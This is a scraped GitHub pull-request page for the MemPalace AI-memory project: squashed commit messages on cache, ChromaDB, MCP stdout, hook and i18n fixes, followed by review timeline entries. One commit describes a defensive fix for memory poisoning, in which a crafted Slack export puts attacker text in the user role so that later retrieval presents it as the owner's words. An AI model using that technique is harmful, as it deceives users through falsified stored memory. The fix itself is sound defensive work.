network, 404 handling, and cache-not-persisted-on-local-only behaviour Refs: MemPalace/mempalace#809 * fix: improve research() cache read path and deduplicate test mocks - Use .get() instead of .setdefault() for cache reads in research() so the local-only path never mutates _data unnecessarily - Move .setdefault() to the network-write path only - Use result.setdefault() for word/confirmed keys to ensure consistent return shape across all _wikipedia_lookup error paths - Extract duplicated mock_result dict into _MOCK_SAOIRSE_PERSON constant shared by 3 test functions * fix: return empty status instead of error on cold-start palace (#830) (#831) tool_status() called _get_collection() with the default create=False, which throws when the ChromaDB collection does not exist yet (valid palace, zero drawers). The exception was swallowed and status returned "No palace found" even though init had completed successfully. Switching to create=True bootstraps an empty collection on first status call, matching what the write path already does. Fix suggested by @hkevinchu in the issue. * fix(searcher): guard against empty ChromaDB query results (#195) (#865) Fixes #195. When ChromaDB returns no documents (empty palace, or wing/room filter that excludes everything), it returns the shape: {"documents": [], "metadatas": [], "distances": []} Indexing `results["documents"][0]` blindly raises IndexError instead of the expected 'no results' response. Affected: searcher.search(), searcher.search_memories() (drawer + closet branches plus the total_before_filter aggregate), and Layer3.search() / Layer3.search_raw(). Adds a tiny private helper `searcher._first_or_empty(results, key)` that safely extracts the inner list, returning [] for any of: missing key, empty outer list, [None], or [[]]. layers.py imports the same helper to avoid duplicating the guard. Tests: tests/test_empty_chromadb_results.py covers all observed shapes plus a documentation-style test that pins the original IndexError so future readers understand why the helper exists. * fix(init): auto-add per-project files to .gitignore in git repos (#185) (#866) Partially addresses #185. `mempalace init <dir>` writes `mempalace.yaml` and `entities.json` into the project root. When <dir> is a git repository, those files have no default protection and risk being committed by accident — the loudest concern in the original report. This PR adds `_ensure_mempalace_files_gitignored()` which runs at the end of cmd_init: if <dir>/.git exists, append the two filenames to .gitignore (creating it if necessary) under a clearly-marked block. The helper is conservative: - only runs when <dir>/.git is present (no-op for non-git projects) - skips entries already present (no duplicates) - preserves existing .gitignore content - handles files without trailing newlines This does NOT relocate the files to ~/.mempalace/wings/<wing>/ as the issue's 'Expected' section proposes — that's a behavioral change with miner/config implications and warrants a separate design discussion. The gitignore safeguard removes the immediate risk without breaking any existing flow. Tests: 5 cases in tests/test_init_gitignore_protection.py covering no-op, fresh creation, partial append, idempotency, and missing-newline edge case. * fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225) (#864) * fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225) Fixes #225. Several transitive dependencies (chromadb, onnxruntime, posthog) print banners and warnings to stdout — sometimes at the C level — during the mcp_server import chain. Because the MCP protocol multiplexes JSON-RPC over stdio, any non-JSON output on stdout corrupted the message stream and broke Claude Desktop's parser with errors like: MCP mempalace: Unexpected token '*', "**********"... is not valid JSON MCP mempalace: Unexpected token 'E', "EP Error D"... is not valid JSON MCP mempalace: Unexpected token 'F', "Falling ba"... is not valid JSON Reproduced on Windows 11 with mempalace 3.0.0 / Python 3.10 / Claude Desktop 1.1062.0. Fix: at module load, redirect stdout to stderr at both the Python level (sys.stdout = sys.stderr) and the file-descriptor level (os.dup2(2, 1)) to catch C-level prints, while preserving the real stdout for later restore. main() calls _restore_stdout() right before entering the protocol loop so JSON-RPC responses still go to the real stdout. Adds tests/test_mcp_stdio_protection.py with three regression tests: - module-level redirect is in place after import - _restore_stdout() restores the original stdout (idempotent) - 'python -m mempalace.mcp_server' with empty stdin emits no stdout * style: reformat with ruff 0.4 (CI version) for #225 * fix(hooks): stop precompact hook from blocking compaction (#856, #858) (#863) * fix(hooks): stop precompact hook from blocking compaction The precompact hook unconditionally returned {"decision": "block"}, which in Claude Code means "cancel compaction" with no retry mechanism. This made /compact permanently broken for all plugin users. Changed hook_precompact() to mine the transcript synchronously (so data lands before compaction) and return {"decision": "allow"}. This matches the standalone bash hook in hooks/ which already uses allow. Also extracted _get_mine_dir() and _mine_sync() helpers so precompact can mine from the transcript directory, not just MEMPAL_DIR. Stop hook behavior is unchanged -- left for #673 which implements the full silent save path. Closes #856, closes #858. * fix: use empty JSON instead of invalid \"allow\" decision value Claude Code only recognizes \"block\" as a top-level decision value. \"allow\" is a permissionDecision value for PreToolUse hooks, not a valid top-level decision. The correct way to not block is to return empty JSON. Caught by #872. * feat: include created_at timestamp in search results (#846) * feat: include created_at timestamp in search results (closes #465) Surface the existing filed_at metadata as created_at in search result objects returned by search_memories(). Enables temporal reasoning over search hits without additional queries. * Feat: add fallback for missing filed_at metadata * fix: add provenance header and speaker IDs to Slack transcript imports (#815) * fix: add provenance header and speaker IDs to Slack transcript imports Slack exports are multi-party chats where no speaker is inherently the "user" or "assistant". The parser previously assigned these roles purely by position, allowing a crafted export to place attacker text in the "user" role — making it appear as the memory owner's words in all future retrieval (data poisoning via stored memory). Changes: - Add provenance header marking Slack transcripts as multi-party with positional (unverified) role assignment - Prefix each message with the original speaker ID ([U1], [U2], etc.) so downstream consumers can distinguish authors - Keep user/assistant role alternation for exchange-pair chunking compatibility with convo_miner.py Tests: - Provenance header presence and content - Speaker ID preservation in output - Attacker-first-message attribution verification Refs: MemPalace/mempalace#809 * fix: move Slack provenance to footer, sanitize speaker IDs, extract constant - Move provenance notice from header to footer to prevent it becoming a standalone ChromaDB drawer via paragraph chunking on exports with fewer than 3 exchange pairs (violates verbatim-always principle) - Sanitize speaker user_id/username: strip brackets, newlines, and control characters to prevent chunk-boundary injection via crafted Slack exports - Extract header string to _SLACK_PROVENANCE_FOOTER module constant, consistent with _TOOL_RESULT_* constants pattern; tests import it instead of duplicating the literal Refs: MemPalace/mempalace#809 * fix: restrict file permissions on sensitive palace data (#814) * fix: restrict file permissions on sensitive palace data On Linux with default umask (022), several files and directories containing personal data were created world-readable. This patch applies chmod 0o700 to directories and 0o600 to files immediately after creation, wrapped in try/except for Windows compatibility. Files hardened: - hooks_cli.py: hook_state/ directory and hook.log - entity_registry.py: entity_registry.json (names, relationships) - knowledge_graph.py: knowledge_graph.sqlite3 parent directory - exporter.py: export output directory and wing subdirectories - config.py: people_map.json (name mappings) - mcp_server.py: WAL file creation uses atomic os.open (TOCTOU fix) Refs: MemPalace/mempalace#809 * fix: avoid redundant chmod calls on hot paths - hooks_cli.py: chmod STATE_DIR and hook.log only on first creation, not on every _log() call (hooks fire on every Stop event) - exporter.py: track created wing dirs to skip redundant makedirs + chmod on the same directory across batches - mcp_server.py: remove redundant _WAL_FILE.chmod after os.open already set mode=0o600 atomically Refs: MemPalace/mempalace#809 * test: add palace_graph tunnel helper coverage Adds focused tests for explicit tunnel helpers in `mempalace/palace_graph.py`. Covered: - `_load_tunnels` - `_save_tunnels` - `create_tunnel` - `list_tunnels` - `delete_tunnel` - `follow_tunnels` * refactor(entity_detector): make multi-language extensible via i18n JSON Move all entity-detection lexical patterns (person verbs, pronouns, dialogue markers, project verbs, stopwords, candidate character class) out of hardcoded module-level constants and into the entity section of each locale's JSON in mempalace/i18n/. Adds a languages parameter to every public function so callers union patterns across the desired locales. The default stays ("en",), so all existing callers and tests behave unchanged. Also adds: - get_entity_patterns(langs) helper in mempalace/i18n/ that merges patterns across requested languages, dedupes lists, unions stopwords, and falls back to English for unknown locales - MempalaceConfig.entity_languages property + setter, with env var override (MEMPALACE_ENTITY_LANGUAGES, comma-separated) - mempalace init --lang en,pt-br flag (persists to config.json) - Per-language candidate_pattern so non-Latin scripts (Cyrillic, Devanagari, CJK) can register their own character classes instead of being silently dropped by the ASCII-only [A-Z][a-z]+ default - _build_patterns LRU cache keyed by (name, languages) so multi-language callers don't poison each other's cache slots Why now: the open language PRs (#760 ru, #773 hi, #778 id, #907 it) only add CLI strings via mempalace/i18n/. PR #156 (pt-br) is the first that needed entity_detector changes and inlined a _PTBR variant of every constant. That doesn't scale past 2-3 languages — every text gets checked against every language's patterns regardless of relevance, and candidate extraction still drops accented and non-Latin names. This PR sets the standard so future locale contributors only edit one JSON file (no Python changes), and entity detection scales linearly with how many languages a user actually enabled, not how many ship. * test: document orphan-locale recovery for _temp_locale helper * feat: add Russian language support to i18n module Add ru.json with full Russian translations for CLI strings, palace terminology, AAAK compression instruction, and regex patterns for topic/action extraction with Cyrillic character classes. No code changes needed -- the i18n module auto-discovers language files via *.json glob in the i18n directory. * feat(i18n): add entity detection section to Russian locale Cyrillic candidate/multi-word patterns, person-verb patterns (сказал, спросил, ответил, etc.), pronoun patterns, dialogue markers, direct address, and Russian stopwords. Follows the i18n entity framework from #911. * fix(i18n): apply review feedback on ru.json (#760) - mine_skip: "повторной раскопки" -> "повторной обработки" - quote_pattern: add Russian guillemet quotes «» Co-Authored-By: almirus <[email protected]> * feat(i18n): expand Russian entity stopwords with prepositions and conjunctions Adds 34 prepositions and conjunctions to reduce false positives in entity detection when these words appear sentence-initial. Co-Authored-By: almirus <[email protected]> * feat: add italian i18n support * feat: add italian entity patterns * Updated hi.json to support infra for entity,pronoun_patterns,dialogue_patterns,direct_address_pattern, project_verb_patterns and stopwords * feat(i18n): add Brazilian Portuguese locale with entity detection (closes #117) CLI strings, AAAK instruction, regex patterns, and entity section with person-verb, pronoun, dialogue, and candidate patterns for Latin+diacritics names (Joao, Ines, Angela). Follows the i18n entity framework from #911. * fix(i18n): address review feedback on pt-br.json - dialogue_patterns[0]: remove stray \" before > (fixes markdown quote matching) - entity stopwords: add 40 prepositions, conjunctions, and common words to reduce false positives - pronoun_patterns: add 2nd-person (você/vocês) and possessives (seu/sua/seus/suas) * feat(cli): add version display and version flag to CLI Introduces a version label to the command-line interface, displaying the current MemPalace version in the help text. Adds a `--version` flag to allow users to easily check the version and exit. * fix(i18n): resolve language codes case-insensitively (#927) BCP 47 language tags are case-insensitive (RFC 5646 §2.1.1) but the locale files mix conventions (pt-br.json vs zh-CN.json). On case-sensitive filesystems, '--lang PT-BR' or '--lang zh-cn' silently missed the file, _load_entity_section returned {}, and entity detection ran in English with no warning. The cache key in get_entity_patterns was built from raw input, so ('PT-BR',) and ('pt-br',) produced two distinct entries, both wrong. Add _canonical_lang(lang) that resolves any casing to the on-disk filename stem via lowercase comparison, and route load_lang, _load_entity_section, and the cache key through it. Closes #927 * fix(i18n): use Optional[str] for Python 3.9 compatibility PEP 604 union syntax (str | None) requires Python 3.10+. The project supports 3.9 per CI matrix, so use typing.Optional instead. * fix(entity_detector): script-aware word boundaries for combining-mark scripts Python's \b is a \w/non-\w transition. Devanagari vowel signs (matras) like ा ी ु are Unicode category Mc (Mark, Spacing Combining) — not \w. This means \b splits mid-word on every matra: names like अनीता (Anita) truncate to अनीत, and person-verb patterns like \bराज\s+ने\s+कहा\b never match because \b fails after the final matra of कहा. Same issue affects Arabic, Hebrew, Thai, Tamil, and every other script whose words contain combining marks. Fix: locales with combining-mark scripts declare a boundary_chars field in their entity section (e.g. "\\w\\u0900-\\u097F" for Hindi). The i18n loader replaces every \b in that locale's patterns with a script-aware lookaround that treats the declared characters as "inside-word", and pre-wraps candidate/multi_word patterns with the same boundary. Default behavior (no boundary_chars) keeps standard \b — en, pt-br, ru, it are unchanged. Changes: - mempalace/i18n/__init__…

mvalentsev force-pushed the feat/pt-br-entity-detection branch from b4ea25e to 0990c10 Compare April 9, 2026 06:17

mvalentsev mentioned this pull request Apr 9, 2026

fix: filter programming keywords from entity detection (#348) #349

Closed

mvalentsev force-pushed the feat/pt-br-entity-detection branch from 0990c10 to 879de92 Compare April 9, 2026 16:44

This was referenced Apr 9, 2026

Domain-scoped collections + local embedding model = better retrieval at scale #273

Open

[Feature] Add Multilingual Support #231

Open

mvalentsev force-pushed the feat/pt-br-entity-detection branch 3 times, most recently from 4f05ed5 to 3d250ad Compare April 9, 2026 21:05

EndeavorYen mentioned this pull request Apr 10, 2026

feat: add multilingual support via embedding-based semantic classification #488

Open

8 tasks

mvalentsev force-pushed the feat/pt-br-entity-detection branch 2 times, most recently from e15ccd1 to 0afc71f Compare April 10, 2026 15:52

mvalentsev requested review from bensig and milla-jovovich as code owners April 10, 2026 15:52

mvalentsev force-pushed the feat/pt-br-entity-detection branch from 0afc71f to 3e9435a Compare April 10, 2026 16:43

web3guru888 mentioned this pull request Apr 11, 2026

Add NLP capabilities with local models - adds multi-lingual support and improves evaluation results #507

Open

3 tasks

web3guru888 reviewed Apr 11, 2026

View reviewed changes

mvalentsev force-pushed the feat/pt-br-entity-detection branch from 4bb281e to b6d597b Compare April 11, 2026 11:27

bensig changed the base branch from main to develop April 11, 2026 22:23

bensig requested a review from igorls as a code owner April 11, 2026 22:23

mvalentsev force-pushed the feat/pt-br-entity-detection branch 2 times, most recently from cc5f60c to 6e7946a Compare April 12, 2026 06:49

mvalentsev force-pushed the feat/pt-br-entity-detection branch 4 times, most recently from 5639b00 to a55770a Compare April 13, 2026 23:49

igorls added the area/i18n Multilingual, Unicode, non-English embeddings label Apr 14, 2026

mvalentsev force-pushed the feat/pt-br-entity-detection branch 2 times, most recently from c3229f9 to c0392be Compare April 15, 2026 06:03

igorls mentioned this pull request Apr 15, 2026

refactor(entity_detector): make multi-language extensible via i18n JSON #911

Merged

6 tasks

mvalentsev force-pushed the feat/pt-br-entity-detection branch from c0392be to 342568a Compare April 15, 2026 12:51

mvalentsev mentioned this pull request Apr 15, 2026

feat: add Russian language support (ru.json) #760

Merged

mvalentsev force-pushed the feat/pt-br-entity-detection branch from 9fd98dc to 540bab2 Compare April 15, 2026 17:04

mvalentsev force-pushed the feat/pt-br-entity-detection branch from 540bab2 to e791806 Compare April 15, 2026 17:16

mvalentsev added 2 commits April 15, 2026 23:32

mvalentsev force-pushed the feat/pt-br-entity-detection branch from e791806 to 4221589 Compare April 15, 2026 18:32

igorls merged commit 57b0b14 into MemPalace:develop Apr 15, 2026
6 checks passed

igorls mentioned this pull request Apr 16, 2026

release: v3.3.1 #957

Merged

8 tasks

mvalentsev mentioned this pull request Apr 19, 2026

feat(i18n): add Hebrew language support #1031

Closed

3 tasks

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

feat: add Brazilian Portuguese support to entity_detector (closes #117)#156

feat: add Brazilian Portuguese support to entity_detector (closes #117)#156
igorls merged 2 commits intoMemPalace:developfrom
mvalentsev:feat/pt-br-entity-detection

mvalentsev commented Apr 7, 2026 •

edited

Loading

Uh oh!

bgauryy commented Apr 8, 2026

Uh oh!

mvalentsev commented Apr 9, 2026

Uh oh!

web3guru888 left a comment

Uh oh!

web3guru888 left a comment

Uh oh!

mvalentsev commented Apr 11, 2026

Uh oh!

web3guru888 commented Apr 11, 2026

Uh oh!

mvalentsev commented Apr 11, 2026

Uh oh!

mvalentsev commented Apr 15, 2026

Uh oh!

mvalentsev commented Apr 15, 2026 •

edited

Loading

Uh oh!

igorls commented Apr 15, 2026

Uh oh!

mvalentsev commented Apr 15, 2026

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

4 participants

Conversation

mvalentsev commented Apr 7, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

What does this PR do?

What's in pt-br.json

How to test

Checklist

What does this PR do?

Uh oh!

bgauryy commented Apr 8, 2026

PR Review: feat: add Brazilian Portuguese support to entity_detector (closes #117)

Executive Summary

Ratings

PR Health

Medium Priority Issues

🐛 #1: Portuguese direct-address patterns double-counted in person_verbs + direct

Low Priority Issues

🎨 #2: DIALOGUE_PATTERNS_PTBR contains only one pattern

🔗 #3: No Portuguese PROJECT_VERB_PATTERNS — project signals absent for pt-br text

What's Done Well

Uh oh!

mvalentsev commented Apr 9, 2026

Uh oh!

web3guru888 left a comment

Choose a reason for hiding this comment

Review: Brazilian Portuguese Support for entity_detector

What's done well

Issues found

Suggestions

Overall

Uh oh!

web3guru888 left a comment

Choose a reason for hiding this comment

PR #156 — feat: add Brazilian Portuguese support to entity_detector

What works well

Issues / suggestions

Minor

Verdict

Uh oh!

mvalentsev commented Apr 11, 2026

Uh oh!

web3guru888 commented Apr 11, 2026

Uh oh!

mvalentsev commented Apr 11, 2026

Uh oh!

mvalentsev commented Apr 15, 2026

Uh oh!

mvalentsev commented Apr 15, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

igorls commented Apr 15, 2026

Uh oh!

mvalentsev commented Apr 15, 2026

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

4 participants

mvalentsev commented Apr 7, 2026 •

edited

Loading

🐛 #1: Portuguese direct-address patterns double-counted in `person_verbs` + `direct`

🎨 #2: `DIALOGUE_PATTERNS_PTBR` contains only one pattern

🔗 #3: No Portuguese `PROJECT_VERB_PATTERNS` — project signals absent for pt-br text

Review: Brazilian Portuguese Support for `entity_detector`

PR #156 — `feat: add Brazilian Portuguese support to entity_detector`

mvalentsev commented Apr 15, 2026 •

edited

Loading